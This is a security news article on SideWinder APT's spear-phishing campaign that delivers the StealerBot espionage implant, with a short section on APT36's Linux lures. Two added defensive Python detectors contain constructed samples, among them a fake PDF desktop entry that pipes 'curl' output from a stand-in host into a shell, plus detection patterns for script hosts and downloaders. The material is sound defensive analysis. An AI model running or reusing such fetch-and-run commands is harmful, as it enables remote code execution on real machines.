SideWinder APT Hits Middle East and Africa With Covert Multi-Phase Strike

A sophisticated persistent threat (APT) group with alleged connections to India has initiated a series of strikes against prominent organizations and critical infrastructures in the Middle East and Africa.


The assaults have been linked to a faction known as SideWinder, also identified as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04.

Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov expressed, “The group, although appearing to have basic skills with the use of common exploits and malicious tactics, has displayed intricate operations that unveil their true capabilities.”

The targets of these attacks encompass governmental and military bodies, logistical, infrastructural, and telecommunication firms, financial establishments, universities, and oil trade companies situated in Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey, and the U.A.E.

Additionally, SideWinder has been seen focusing on diplomatic entities in Afghanistan, France, China, India, Indonesia, and Morocco.


The most notable element of the recent campaign is the deployment of a multi-phase infection technique to introduce a novel post-exploitation kit called StealerBot.

The process starts with a targeted spear-phishing email containing an attachment – either a ZIP archive carrying a Windows shortcut (LNK) file or a Microsoft Office document – which triggers a succession of intermediary JavaScript and .NET downloaders to eventually introduce the StealerBot malware.

The documents use the well-known remote template injection technique to fetch an RTF file hosted on an attacker-controlled server. The RTF file, in turn, exploits CVE-2017-11882 to run JavaScript code, which then retrieves and executes additional JavaScript hosted on mofa-gov-sa.direct888[.]net.

The LNK file, by contrast, invokes the mshta.exe utility, a native Windows binary designed to execute Microsoft HTML Application (HTA) files, to run JavaScript code hosted on a malicious website controlled by the attacker.

The JavaScript malware is designed to decode an embedded string into a .NET library dubbed “App.dll”, which gathers system data and serves as a downloader for a secondary .NET payload (“ModuleInstaller.dll”) fetched from a remote server.

ModuleInstaller acts as a downloader as well, equipped to establish persistence on the system, execute a backdoor loader module, and retrieve subsequent components. Interestingly, the way these components are executed is contingent on the type of endpoint security solution installed on the system.
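As an added example (not from Kaspersky's report), the following Python checks constructed process-creation events for two behaviours in the chain described above: mshta.exe launched with a remote URL, and a script host spawned by an Office process or by EQNEDT32.EXE, the Equation Editor binary that CVE-2017-11882 affects. Field names and the sample events are assumptions of this example, not real telemetry.

```python
import re

# Constructed sample events; field names loosely mimic Sysmon process creation.
# The domain example.invalid stands in for the attacker-controlled host.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://example.invalid/stage.hta"},
    {"id": 2, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\x.js"},
    {"id": 3, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Program Files\App\help.hta"},   # local HTA, benign
    {"id": 4, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Office hosts plus the Equation Editor process exploited via CVE-2017-11882.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}


def _basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons an event looks like this infection chain."""
    image = _basename(event["image"])
    parent = _basename(event.get("parent_image", ""))
    cmdline = event.get("cmdline", "")
    reasons = []
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        reasons.append("mshta.exe launched with a remote URL (LNK -> HTA/JS stage)")
    if image in SCRIPT_HOSTS and parent in DOCUMENT_PARENTS:
        reasons.append(f"{image} spawned by {parent} (document/exploit stage)")
    return reasons


def find_suspicious(events):
    """Map event id -> reasons for every event that trips at least one check."""
    return {e["id"]: r for e in events if (r := classify(e))}


if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(event_id, reasons)
```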

“The backdoor loader module has been under observation since 2020,” highlighted the researchers, noting its ability to evade detection and to avoid running in sandboxed environments. “It has remained relatively unaltered over the years.”


“There has been a recent update by the attacker; however, the principal distinction is that earlier variants are coded to load an encrypted file using a specified filename embedded within the program, while the latest versions are crafted to enumerate files in the current directory and load those without an extension.”

The ultimate objective of these attacks is to deliver StealerBot via the backdoor loader module. Described as an “advanced modular implant” based on .NET, it is tailored to support espionage by fetching various plugins to:

  • Integrate additional malware using a C++ downloader
  • Capture screen images
  • Record keystrokes
  • Extract browser passwords
  • Intercept RDP logins
  • Retrieve files
  • Initiate reverse shell
  • Access Windows credentials through phishing, and
  • Escalate privileges by bypassing User Account Control (UAC)

“The implant is composed of diverse modules managed by the main ‘Orchestrator’, responsible for liaising with the [command-and-control] and running and handling the plugins,” specified the researchers. “The Orchestrator is commonly loaded by the backdoor loader module.”


Kaspersky identified two installer components – named InstallerPayload and InstallerPayload_NET – which are not part of the attack sequence, but are used to deploy StealerBot potentially for an upgrade or to infect another user.

Even as SideWinder broadens its geographical scope and employs an advanced toolkit, Cyfirma has disclosed new infrastructure running the Mythic post-exploitation framework and linked to Transparent Tribe (aka APT36), an adversary group believed to originate from Pakistan.

“The group is circulating malicious Linux desktop entries camouflaged as PDFs,” the announcement explained. “These entries execute scripts to download and run malign executables from remote servers, creating ongoing access and avoiding detection.”

“APT36 has begun to focus more on Linux environments due to their extensive use in Indian government institutions, particularly with the Debian-based BOSS OS and the introduction of Maya OS.”
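The Linux tradecraft quoted above can be checked for with a small heuristic over .desktop files. This is an added example, not code from the Cyfirma report; the two entries below are constructed (example.invalid stands in for the remote server), and the name, icon and Exec patterns it looks for are assumptions of this example.

```python
import configparser
import re

# Constructed samples: a genuine viewer launcher and an entry styled as a PDF.
LEGIT_ENTRY = """[Desktop Entry]
Type=Application
Name=Document Viewer
Exec=evince %U
Icon=org.gnome.Evince
Terminal=false
"""
SUSPECT_ENTRY = """[Desktop Entry]
Type=Application
Name=Annual_Report.pdf
Icon=application-pdf
Exec=sh -c "curl -s http://example.invalid/update | sh"
Terminal=false
"""

PDF_NAME = re.compile(r"\.pdf\s*$", re.IGNORECASE)
INTERPRETERS = re.compile(r"\b(sh|bash|dash|zsh|python3?|perl)\b")
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE)


def parse_desktop_entry(text):
    """Parse the [Desktop Entry] group into a dict, or None if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case so Name and Name[en] stay distinct
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else None


def assess(text):
    """Return findings for a .desktop file that presents itself as a PDF."""
    entry = parse_desktop_entry(text)
    if entry is None:
        return []
    name, icon, exec_line = (entry.get(k, "") for k in ("Name", "Icon", "Exec"))
    looks_like_pdf = bool(PDF_NAME.search(name)) or "pdf" in icon.lower()
    findings = []
    if looks_like_pdf and INTERPRETERS.search(exec_line):
        findings.append("PDF-styled entry whose Exec runs a shell or interpreter")
    if looks_like_pdf and REMOTE_FETCH.search(exec_line):
        findings.append("PDF-styled entry whose Exec fetches content from a remote server")
    return findings


if __name__ == "__main__":
    print(assess(LEGIT_ENTRY), assess(SUSPECT_ENTRY))
```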
